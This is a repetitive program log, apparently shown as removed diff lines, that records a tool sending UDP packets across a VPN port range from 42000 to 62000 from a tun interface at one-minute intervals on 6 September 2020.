size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:19:07 -Starting port fill at 2020-09-06 05:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:20:05 -Starting port fill at 2020-09-06 05:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:21:05 -Starting port fill at 2020-09-06 05:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:22:05 -Starting port fill at 2020-09-06 05:23:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:23:05 -Starting port fill at 2020-09-06 05:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:24:04 -Starting port fill at 2020-09-06 05:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:25:04 -Starting port fill at 2020-09-06 05:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:26:05 -Starting port fill at 2020-09-06 05:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:27:05 -Starting port fill at 2020-09-06 05:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:28:04 -Starting port fill at 2020-09-06 05:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:29:04 -Starting port fill at 2020-09-06 05:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:30:04 -Starting port fill at 2020-09-06 05:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:31:04 -Starting port fill at 2020-09-06 05:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:32:05 -Starting port fill at 2020-09-06 05:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:33:04 -Starting port fill at 2020-09-06 05:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:34:05 -Starting port fill at 2020-09-06 05:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:35:05 -Starting port fill at 2020-09-06 05:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 05:36:07 -Starting port fill at 2020-09-06 05:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:37:06 -Starting port fill at 2020-09-06 05:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:38:05 -Starting port fill at 2020-09-06 05:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 05:39:06 -Starting port fill at 2020-09-06 05:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 